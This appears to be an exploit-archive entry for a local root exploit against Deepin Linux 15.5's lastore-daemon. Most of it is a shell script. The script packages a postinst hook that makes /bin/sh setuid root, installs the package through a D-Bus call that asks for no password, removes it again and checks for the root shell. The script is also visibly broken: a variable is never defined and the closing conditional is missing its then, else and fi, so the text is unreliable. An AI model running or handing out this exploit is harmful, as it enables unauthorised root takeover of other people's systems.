Deepin Linux 15 - 'lastore-daemon' Local Privilege Escalation

ID: 101770
CVE: None
Download vulnerable application: None
# Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit
# The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any user
# in the sudo group to install arbitrary packages without providing a password,
# resulting in code execution as root. By default, the first user created on
# the system is a member of the sudo group.
# ~ bcoles
# Based on exploit by King's Way:
echo Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit
echo Building package...
UUID=$(cat /dev/urandom | tr -dc 'a-z0-9' | fold -w 32 | head -n 1)
mkdir "${BASE}${UUID}" && mkdir "${BASE}${UUID}/DEBIAN"
echo -e "Package: ${UUID}\nVersion: 0.1\nMaintainer: ${UUID}\nArchitecture: all\nDescription: ${UUID}" > ${BASE}${UUID}/DEBIAN/control
echo -e "#!/bin/sh\ncp /bin/sh ${BASE}/rootsh\nchmod 04755 ${BASE}/rootsh\n" > ${BASE}${UUID}/DEBIAN/postinst
chmod +x ${BASE}${UUID}/DEBIAN/postinst
dpkg-deb --build "${BASE}${UUID}"
echo Installing package...
dbus-send --system --dest=com.deepin.lastore --type=method_call --print-reply /com/deepin/lastore com.deepin.lastore.Manager.InstallPackage string:"${UUID}" string:"${BASE}${UUID}.deb"
sleep 10
echo Removing package...
dbus-send --system --dest=com.deepin.lastore --type=method_call --print-reply /com/deepin/lastore com.deepin.lastore.Manager.RemovePackage string:" " string:"${UUID}"
rm -rf "${BASE}${UUID}" "${BASE}${UUID}.deb"
if [ -f /tmp/rootsh ]
  echo "Success! Found root shell: /tmp/rootsh"
  echo "Exploit failed! Check /var/log/lastore/daemon.log"
1-4-2 (www01)